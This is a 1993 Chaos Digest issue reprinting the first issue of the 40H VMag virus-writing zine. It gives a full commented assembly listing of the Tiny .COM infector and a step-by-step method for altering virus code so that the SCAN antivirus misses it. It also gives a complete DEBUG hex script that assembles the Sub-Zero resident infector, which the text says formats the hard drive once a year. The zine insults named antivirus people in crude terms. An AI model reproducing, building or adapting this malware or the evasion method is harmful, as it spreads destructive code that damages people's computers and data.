HPAVC

home *** CD-ROM | disk | FTP | other *** search

/ HPAVC / HPAVC CD-ROM.iso / pc / KAOS1_25.ZIP / KAOS1-25

Wrap

Text File | 1993-05-17 | 23.7 KB | 624 lines

Chaos Digest Lundi 17 Mai 1993 Volume 1 : Numero 25 ISSN 1244-4901 Editeur: Jean-Bernard Condat (jbcondat@attmail.com) Archiviste: Yves-Marie Crabbe Co-Redacteurs: Arnaud Bigare, Stephane Briere TABLE DES MATIERES, #1.25 (17 Mai 1993) File 1--40H VMag Issue 1 Volume 1 #000-3 (reprint) Chaos Digest is a weekly electronic journal/newsletter. Subscriptions are available at no cost by sending a message to: linux-activists-request@niksula.hut.fi with a mail header or first line containing the following informations: X-Mn-Admin: join CHAOS_DIGEST The editors may be contacted by voice (+33 1 47874083), fax (+33 1 47877070) or S-mail at: Jean-Bernard Condat, Chaos Computer Club France [CCCF], B.P. 155, 93404 St-Ouen Cedex, France. He is a member of the EICAR and EFF (#1299) groups. Issues of ChaosD can also be found on some French BBS. Back issues of ChaosD can be found on the Internet as part of the Computer underground Digest archives. They're accessible using anonymous FTP from: * kragar.eff.org [192.88.144.4] in /pub/cud/chaos * uglymouse.css.itd.umich.edu [141.211.182.53] in /pub/CuD/chaos * halcyon.com [192.135.191.2] in /pub/mirror/cud/chaos * ftp.cic.net [192.131.22.2] in /e-serials/alphabetic/c/chaos-digest * ftp.ee.mu.oz.au [128.250.77.2] in /pub/text/CuD/chaos * nic.funet.fi [128.214.6.100] in /pub/doc/cud/chaos * orchid.csv.warwick.ac.uk [137.205.192.5] in /pub/cud/chaos CHAOS DIGEST is an open forum dedicated to sharing French information among computerists and to the presentation and debate of diverse views. ChaosD material may be reprinted for non-profit as long as the source is cited. Some authors do copyright their material, and they should be contacted for reprint permission. Readers are encouraged to submit reasoned articles in French, English or German languages relating to computer culture and telecommunications. Articles are preferred to short responses. Please avoid quoting previous posts unless absolutely necessary. DISCLAIMER: The views represented herein do not necessarily represent the views of the moderators. Chaos Digest contributors assume all responsibility for ensuring that articles submitted do not violate copyright protections. ---------------------------------------------------------------------- Date: Tue May 11 09:24:40 PDT 1993 From: 0005847161@mcimail.com (American_Eagle_Publication_Inc. ) Subject: File 1--40H VMag Issue 1 Volume 1 #000-3 (reprint) 40H Vmag Issue 1 Volume 1 00000 Introduction - This is a down and dirty zine on wich gives examples on writing viruses and this magazines contains code that can be compiled to viruses. If you are an anti-virus pussy, who is just scared that your hard disk will get erased so you have a psycological problem with viruses, erase these files. This aint for you. INDEX 001...........................Virus Spotlight, The Tiny virus 002...........................How to modify viruses to avoid SCAN 003...........................Sub-Zero virus 004...........................Simple encryption techniques and Leprosy-B 005...........................1992 virus Staff - Editior, Technical Consultant - Hellraiser Co-Editor, Theory Consultant - Bionic Slasher +++++ 40H Vmag Issue 1 Volume 1 00001 - VIRUS SPOTLIGHT - The first virus I would like to spotlight is the Tiny virus, lets see what our good friend Patti Hoffman (bitch) has written about it. Name: Tiny Aliases: 163 COM Virus, Tiny 163 Virus, Kennedy-163 V Status: Rare Discovery: June, 1990 Symptoms: COMMAND.COM & .COM file growth Origin: Denmark Eff Length: 163 Bytes Type Code: PNCK - Parasitic Non-Resident .COM Infector Detection Method: ViruScan V64+, VirexPC, F-Prot 1.12+, NAV, IBM Scan 2.00+ Removal Instructions: Scan/D, F-Prot 1.12+, or Delete infected files General Comments: The 163 COM Virus, or Tiny Virus, was isolated by Fridrik Skulason of Iceland in June 1990. This virus is a non-resident generic .COM file infector, and it will infect COMMAND.COM. The first time a file infected with the 163 COM Virus is executed, the virus will attempt to infect the first .COM file in the current directory. On bootable diskettes, this file will normally be COMMAND.COM. After the first .COM file is infected,each time an infected program is executed another .COM file will attempt to be infected. Files are infected only if their original length is greater than approximately 1K bytes. Infected .COM files will increase in length by 163 bytes, and have date/time stamps in the directory changed to the date/time the infection occurred. Infected files will also always end with this hex string: '2A2E434F4D00'. This virus currently does nothing but replicate, and is the smallest MS-DOS virus known as of its isolation date. The Tiny Virus may or may not be related to the Tiny Family. ^like she'd know the difference! OK, Theres the run down on the smallest MS-DOS virus known to man. As for it being detected by SCAN we'll see about that. Here is a dissasembly of the virus, It can be assembled under Turbo Assembler or MASM. ----------------------------------------------------------------------------- PAGE 59,132 data_2e equ 1ABh ;start of virus seg_a segment byte public assume cs:seg_a, ds:seg_a ;assume cs, ds - code org 100h ;orgin of all COM files s proc far start: jmp loc_1 ;jump to virus ;this is a replacement for an infected file db 0CDh, 20h, 7, 8, 9 ;int 20h ;pop es loc_1: call sub_1 s endp sub_1 proc near pop si ;locate all virus code via sub si,10Bh ;si, cause all offsets will mov bp,data_1[si] ;change when virus infects add bp,103h ;a COM file lea dx,[si+1A2h] ;offset of '*.COM',0 - via SI xor cx,cx ;clear cx - find only normal ;attributes mov ah,4Eh ;find first file loc_2: int 21h jc loc_6 ;no files found? then quit mov dx,9Eh ;offset of filename found mov ax,3D02h ;open file for read/write access int 21h mov bx,ax ;save handle into bx mov ah,3Fh ;read from file lea dx,[si+1A8h] ;offset of save buffer mov di,dx mov cx,3 ;read three bytes int 21h cmp byte ptr [di],0E9h ;compare buffer to virus id ;string je loc_4 loc_3: mov ah,4Fh ;find the next file jmp short loc_2 ;and test it loc_4: mov dx,[di+1] ;lsh of offset mov data_1[si],dx xor cx,cx ;msh of offset mov ax,4200h ;set the file pointer int 21h mov dx,di ;buffer to save read mov cx,2 ;read two bytes mov ah,3Fh ;read from file int 21h cmp word ptr [di],807h ;compare buffer to virus id je loc_3 ;same? then find another file ;heres where we infect a file xor dx,dx ;set file pointer xor cx,cx ;ditto mov ax,4202h ;set file pointer int 21h cmp dx,0 ;returns msh jne loc_3 ;not the same? find another file cmp ah,0FEh ;lsh = 254??? jae loc_3 ;if more or equal find another file mov ds:data_2e[si],ax ;point to data mov ah,40h ;write to file lea dx,[si+105h] ;segment:offset of write buffer mov cx,0A3h ;write 163 bytes int 21h jc loc_5 ;error? then quit mov ax,4200h ;set file pointer xor cx,cx ;to the top of the file mov dx,1 int 21h mov ah,40h ;write to file lea dx,[si+1ABh] ;offset of jump to virus code mov cx,2 ;two bytes int 21h ;now close the file loc_5: mov ah,3Eh ;close file int 21h loc_6: jmp bp ;jump to original file data_1 dw 0 db '*.COM',0 ;wild card search string sub_1 endp seg_a ends end start --------------------------------------------------------------------------- Its good to start off with a simple example like this. As you can see what the virus does is use the DOS 4Eh function to find the firsy COM file in the directory. If no files are found the program exits. If a file is found it compares the virus id string (the virus jump instruction) to the first two bytes of the COM file. If they match the program terminates. If they don't match the virus will infect the file. Using two key MS-DOS functions to infect. The first - INT 21h Function 42h SET FILE POINTER AH = 42h AL = method code BX = file handle CX = most significant half to offset DX = least " " If there is an error in executing this function the carry flag will be set, and AX will contian the error code. If no error is encountered DX = most significant half of file pointer AX = least " " The second (and most) important function used by any virus is INT 21h Function 40h WRITE TO FILE OR DEVICE AH = 40h BX = handle CX = number of bytes to write DS:DX = segment of buffer Returns AX = bytes transferred on error AX = Error Code and flag is set. An example of Function 40h is ---- mov ah,40h ;set function mov bx,handle ;load bx with handle from prev open mov cx,virus_size ;load cx with # of bytes to write mov dx,offset write_buffer ;load dx with the offset of what to ;write to file int 21h ; This function is used by 98% of all MS-DOS viruses to copy itself to a victim file. Now heres a sample project - create a new strain of Tiny, have it restore the original date and time etc... HR +++++ 40H Vmag Issue 1 Volume 1 00002 - HOW TO MODIFY A VIRUS SO SCAN WON'T CATCH IT - OR HOW TO CREATE NEW VIRUS STRAINS The problem with most viruses is that this dickhead who lives in California named John Mcafee gets his greedy hands on them and turns them into big bucks -- for him. John boy is the reason there are over 500 viruses out there, and I wouldn't doubt if he weren't resposible for writing at least ten of them. So the best thing to do to some Mcafee dependant sucker, or lame board is this. Say you have a copy of a played out virus, lets say an older one like Armstand or Jerusalem. Almost every virus scanner can detect these viruses cause they been around so long. Now heres a quick way to modify viruses so the scanners wont catch them, in turn making them new strains. The tools you need are -- Norton Utilites Debug and/or Turbo Debugger by Borland Now heres what you do. Step A ------ Make a target file like this with Debug Copy the below file with your editor to a file called SAMPLE.USR ----------------------------------------------------------------------------- n sample.com a int 20 rcx 2 w q ----------------------------------------------------------------------------- Then uses Debug to make the file SAMPLE.COM executing this command -- DEBUG < SAMPLE.USR This will make a two byte called SAMPLE.COM STEP B ------ Infect the file with the virus. If this is a boot sector virus your on your own. Do whatever you have to to infect the two byte file. Make a copy of the file and keep it for safe keeping. STEP C ------ Load up DISKEDIT, which comes with Norton 6.0 (I'm not sure if its in the lower versions) PCTOOLS Hex Editor will work too but it takes more work. Now have DISKEDIT Hex-edit the infected file. Now figure out where the middle of the file is. Next put block on and go to the end of the file. At the end of the file go to the edit screen and select fill. Fill the lower half of the file will nonsense characters, its good to select 255d (FFh) the blank character. Now save your changes and go to DOS Now use SCAN to scan the file for viruses. If it detects the virus you didnt delete the search string that SCAN is searching for. Get it??? You see all SCAN does is search files for strings that are related to viruses. For example if SCAN was looking for CASCADE it look for something like this- EB1DAD1273D1FF121F In every file you specify. So what we are doing is narrowing down where that string is in the virus that SCAN keeps finding. So what you have to do is keep deleting parts of the virus with DISKEDIT untill you finally narrow down the string. Keep this in mind, search strings are in the first 150 bytes of the file about 75% of the time. Ok lets say you narrowed down the search string and lets say it's - B8 92 19 B7 21 CD It will most likly be longer but this an example. Now back to DEBUG - Do the following-- DEBUG E 0100 b8 92 19 b7 21 cd -- this is the string you found Then type -- U This will give you a unassembled look at what the id-string is. In this example it was mov ax,1992h mov bx,21h int 21h Now this is what you have to do, and keep in mind the following --- THE FOLLOWING TAKES A SOMEWHAT KNOWING OF ASSEMBLER AND HOW IT WORKS!!!!!! Uses Turbo Debugger to find the string, you can use DEBUG but I don't know how to do this from debug. Ok say you got the string on the screen -- mov ax,1992h mov bh,21h int 21h Write down the locations in the file where these strings are. Ex 0100h etc.. Now rearrange the AX mov with the BX mov like this --- mov bh,21h mov ax,1992h int 21h You see? You didn't change the way the code functions (THATS IF YOU KNOW WHAT YOUR DOING!) but you changed the codes id-string for SCAN. Now since Turbo Debugger dosent let you save the changes you must do it via - Debug. DEBUG virus.com a 0122 - This is the address of the string Now enter the assembler instructions -- mov bh,21 mov ax,1992h int 21h w q Save it and SCAN it, if SCAN doesn't catch it Congrats. If it does --- back to the lab. Oh well you get the point. One warning, this only works with un-encrypting viruses, or on the encryption mechanism of encrypting files (which will most likely be Scanned). With that in mind, have fun. HR +++++ 40H Vmag Issue 1 Volume 1 00003 - SUB-ZERO VIRUS - Heres one for all of you who don't have an assembler. It can be compiled using debug by naming the insert below SUB-ZERO.USR and executing the command - DEBUG < SUB-ZERO.USR ----------------------------------------------------------------------------- n sub-zero.com e 0100 E9 92 00 DA AA A3 AA D4 3A A3 00 01 23 31 00 00 e 0110 00 02 00 04 01 64 30 A0 06 55 2E 56 05 9F 19 A5 e 0120 3E 00 00 00 00 00 00 00 00 00 00 00 00 00 E8 06 e 0130 0E 97 30 80 00 00 00 80 00 97 30 5C 00 97 30 6C e 0140 00 97 30 00 40 46 63 F4 1D D0 5C 00 00 46 00 4D e 0150 5A A0 01 39 00 B4 02 AF 00 7C 04 7C A4 FA 05 10 e 0160 07 84 19 C5 00 FA 05 1C 00 00 00 00 00 00 00 00 e 0170 05 00 20 00 21 00 28 02 00 02 10 00 90 6A 00 00 e 0180 B9 41 2A 97 4C 4F 52 44 20 53 4B 49 53 4D 20 01 e 0190 00 00 00 00 00 FC B4 E0 CD 21 3D 00 E0 73 16 80 e 01A0 FC 03 72 11 BF 00 01 B4 DD BE 10 07 03 F7 2E 8B e 01B0 8D 11 00 CD 21 8C C8 04 10 00 8E D0 BC 00 07 50 e 01C0 B8 C5 00 50 CB 06 FC 2E 8C 06 31 00 2E 8C 06 39 e 01D0 00 2E 8C 06 3D 00 2E 8C 06 41 00 8C C0 05 10 00 e 01E0 2E 01 06 49 00 2E 01 06 45 00 B4 E0 CD 21 80 FC e 01F0 E0 73 13 80 FC 03 07 2E 8E 16 45 00 2E 8B 26 43 e 0200 00 2E FF 2E 47 00 33 C0 8E C0 8B 89 31 DB 2E A3 e 0210 4B 00 26 A0 FE 03 2E A2 4D 00 26 C7 06 FC 03 F3 e 0220 A5 26 C6 06 FE 03 CB 58 04 10 90 8E C0 0E 1F B9 e 0230 00 03 B1 88 33 F6 8B FE 06 B8 42 01 50 EA FC 03 e 0240 00 00 8C C8 8E D0 BC 00 07 33 C0 8E D8 2E A1 4B e 0250 00 A3 FC 03 2E A0 4D 00 A2 FE 03 8B DC B1 04 D3 e 0260 EB 83 C3 10 2E 89 1E 33 00 B4 4A 2E 8E 06 31 00 e 0270 CD 21 B8 21 35 CD 21 2E 89 1E 17 00 2E 8C 06 19 e 0280 00 0E 1F BA 5B 02 B8 21 25 CD 21 8E 06 31 00 26 e 0290 8E 06 2C 00 33 FF B9 FF 7F 32 C0 F2 AE 26 38 05 e 02A0 E0 F9 8B D7 83 C2 03 B8 00 4B 06 1F 0E 07 BB 35 e 02B0 00 52 51 53 50 06 1E B4 2A CD 21 2E C6 06 0E 00 e 02C0 00 81 F9 C6 07 74 30 3C 05 75 0D 80 FA 17 72 08 e 02D0 2E FE 06 0E 00 EB 20 90 B8 08 35 CD 21 2E 89 1E e 02E0 13 00 2E 8C 06 15 00 0E 1F C7 06 1F 00 48 3F B8 e 02F0 08 25 BA 1E 02 CD 21 1F 07 58 5B 59 5A 9C 2E FF e 0300 1E 17 00 1E 07 B4 49 CD 21 B4 4D CD 21 B4 31 BA e 0310 00 06 B1 04 D3 EA 83 C2 10 CD 21 32 C0 CF 2E 83 e 0320 3E 1F 00 09 75 17 52 51 50 B4 2A CD 21 81 FA 06 e 0330 06 75 07 B8 01 07 B2 80 CD 13 58 59 5A 2E 83 2E e 0340 1F 00 01 EB 11 20 20 53 75 62 2D 5A 65 72 6F 20 e 0350 4E 59 48 43 20 20 2E FF 2E 13 00 9C 80 FC E0 75 e 0360 05 B8 00 03 9D CF 80 FC DE 74 2D 80 FC DD 74 0E e 0370 3D 00 4B 75 03 E9 B4 00 9D 2E FF 2E 17 00 58 58 e 0380 B8 00 01 2E A3 0A 00 58 2E A3 0C 00 F3 A4 9D 2E e 0390 A1 0F 00 2E FF 2E 0A 00 83 C4 06 9D 8C C8 8E D0 e 03A0 BC 10 07 06 06 33 FF 0E 07 B9 10 00 8B F3 BF 21 e 03B0 00 F3 A4 8C D8 8E C0 2E F7 26 7A 00 2E 03 06 2B e 03C0 00 83 D2 00 2E F7 36 7A 00 8E D8 8B F2 8B FA 8C e 03D0 C5 2E 8B 1E 2F 00 0B DB 74 13 B9 00 80 F3 A5 05 e 03E0 00 10 81 C5 00 10 8E D8 8E C5 4B 75 ED 2E 8B 0E e 03F0 2D 00 F3 A4 58 50 05 10 00 2E 01 06 29 00 2E 01 e 0400 06 25 00 2E A1 21 00 1F 07 2E 8E 16 29 00 2E 8B e 0410 26 27 00 2E FF 2E 23 00 33 C9 B8 01 43 CD 21 B4 e 0420 3C CD 21 B8 00 4B 9D 2E FF 2E 17 00 2E 80 3E 0E e 0430 00 01 74 E4 2E C7 06 70 00 FF FF 2E C7 06 8F 00 e 0440 00 00 2E 89 16 80 00 2E 8C 1E 82 00 50 53 51 52 e 0450 56 57 1E 06 FC 8B FA 32 D2 80 7D 01 3A 75 05 8A e 0460 15 80 E2 1F B4 36 CD 21 3D FF FF 75 03 E9 77 02 e 0470 F7 E3 F7 E1 0B D2 75 05 3D 10 07 72 F0 2E 8B 16 e 0480 80 00 1E 07 32 C0 B9 41 00 F2 AE 2E 8B 36 80 00 e 0490 8A 04 0A C0 74 0E 3C 61 72 07 3C 7A 77 03 80 2C e 04A0 20 46 EB EC B9 0B 00 2B F1 BF 84 00 0E 07 B9 0B e 04B0 00 F3 A6 75 03 E9 2F 02 B8 00 43 CD 21 72 05 2E e 04C0 89 0E 72 00 72 25 32 C0 2E A2 4E 00 1E 07 8B FA e 04D0 B9 41 00 F2 AE 80 7D FE 4D 74 0B 80 7D FE 6D 74 e 04E0 05 2E FE 06 4E 00 B8 00 3D CD 21 72 5A 2E A3 70 e 04F0 00 8B D8 B8 02 42 B9 FF FF BA FB FF CD 21 72 EB e 0500 05 05 00 2E A3 11 00 B9 05 00 BA 6B 00 8C C8 8E e 0510 D8 8E C0 B4 3F CD 21 8B FA BE 05 00 F3 A6 75 07 e 0520 B4 3E CD 21 E9 C0 01 B8 24 35 CD 21 89 1E 1B 00 e 0530 8C 06 1D 00 BA 1B 02 B8 24 25 CD 21 C5 16 80 00 e 0540 33 C9 B8 01 43 CD 21 72 3B 2E 8B 1E 70 00 B4 3E e 0550 CD 21 2E C7 06 70 00 FF FF B8 02 3D CD 21 72 24 e 0560 2E A3 70 00 8C C8 8E D8 8E C0 8B 1E 70 00 B8 00 e 0570 57 CD 21 89 16 74 00 89 0E 76 00 B8 00 42 33 C9 e 0580 8B D1 CD 21 72 3D 80 3E 4E 00 00 74 03 EB 57 90 e 0590 BB 00 10 B4 48 CD 21 73 0B B4 3E 8B 1E 70 00 CD e 05A0 21 E9 43 01 FF 06 8F 00 8E C0 33 F6 8B FE B9 10 e 05B0 07 F3 A4 8B D7 8B 0E 11 00 8B 1E 70 00 06 1F B4 e 05C0 3F CD 21 72 1C 03 F9 33 C9 8B D1 B8 00 42 CD 21 e 05D0 BE 05 00 B9 05 00 F3 2E A4 8B CF 33 D2 B4 40 CD e 05E0 21 72 0D E9 BC 00 B9 1C 00 BA 4F 00 B4 3F CD 21 e 05F0 72 4A C7 06 61 00 84 19 A1 5D 00 A3 45 00 A1 5F e 0600 00 A3 43 00 A1 63 00 A3 47 00 A1 65 00 A3 49 00 e 0610 A1 53 00 83 3E 51 00 00 74 01 48 F7 26 78 00 03 e 0620 06 51 00 83 D2 00 05 0F 00 83 D2 00 25 F0 FF A3 e 0630 7C 00 89 16 7E 00 05 10 07 83 D2 00 72 3A F7 36 e 0640 78 00 0B D2 74 01 40 A3 53 00 89 16 51 00 A1 7C e 0650 00 8B 16 7E 00 F7 36 7A 00 2B 06 57 00 A3 65 00 e 0660 C7 06 63 00 C5 00 A3 5D 00 C7 06 5F 00 10 07 33 e 0670 C9 8B D1 B8 00 42 CD 21 72 0A B9 1C 00 BA 4F 00 e 0680 B4 40 CD 21 72 11 3B C1 75 18 8B 16 7C 00 8B 0E e 0690 7E 00 B8 00 42 CD 21 72 09 33 D2 B9 10 07 B4 40 e 06A0 CD 21 2E 83 3E 8F 00 00 74 04 B4 49 CD 21 2E 83 e 06B0 3E 70 00 FF 74 31 2E 8B 1E 70 00 2E 8B 16 74 00 e 06C0 2E 8B 0E 76 00 B8 01 57 CD 21 B4 3E CD 21 2E C5 e 06D0 16 80 00 2E 8B 0E 72 00 B8 01 43 CD 21 2E C5 16 e 06E0 1B 00 B8 24 25 CD 21 07 1F 5F 5E 5A 59 5B 58 9D e 06F0 2E FF 2E 17 00 00 00 00 00 00 00 00 00 00 00 00 e 0700 4D 9F 19 00 10 00 00 00 45 44 00 45 4C 00 00 00 e 0710 E9 92 00 DA AA A3 AA D4 3A A3 00 01 23 31 00 00 e 0720 00 02 00 04 01 64 30 A0 06 55 2E 56 05 9F 19 A5 e 0730 3E 00 00 00 00 00 00 00 00 00 00 00 00 00 E8 06 e 0740 0E 97 30 80 00 00 00 80 00 97 30 5C 00 97 30 6C e 0750 00 97 30 00 40 46 63 F4 1D D0 5C 00 00 46 00 4D e 0760 5A A0 01 39 00 B4 02 AF 00 7C 04 7C A4 FA 05 10 e 0770 07 84 19 C5 00 FA 05 1C 00 00 00 00 00 00 00 00 e 0780 05 00 20 00 21 00 28 02 00 02 10 00 90 6A 00 00 e 0790 B9 41 2A 97 4C 4F 52 44 20 53 4B 49 53 4D 20 01 e 07A0 00 00 00 00 00 FC B4 E0 CD 21 3D 00 E0 73 16 80 e 07B0 FC 03 72 11 BF 00 01 B4 DD BE 10 07 03 F7 2E 8B e 07C0 8D 11 00 CD 21 8C C8 04 10 00 8E D0 BC 00 07 50 e 07D0 B8 C5 00 50 CB 06 FC 2E 8C 06 31 00 2E 8C 06 39 e 07E0 00 2E 8C 06 3D 00 2E 8C 06 41 00 8C C0 05 10 00 e 07F0 2E 01 06 49 00 2E 01 06 45 00 B4 E0 CD 21 80 FC e 0800 E0 73 13 80 FC 03 07 2E 8E 16 45 00 2E 8B 26 43 e 0810 CD 20 A3 AA D4 3A A3 1A 1A 1A 1A 1A 1A 1A 1A 1A rcx 717 w q ---------------------------------------------------------------------------- Sub-Zero is a memory resident COM and EXE infector that is based somewhat on on Jerusalem-B. It is the ansestor to the virus Captian Trips which at this time has not been nailed by SCAN. Be carefull because this virus will most likly format you hard drive if you run it on the wrong day. One day of the year it will perform a HD format. I think it's in June, hmmmm... D-Day rings a bell. As of Scan-77 this virus can not be detected by SCAN or F-Prot. HR ------------------------------ End of Chaos Digest #1.25 ************************************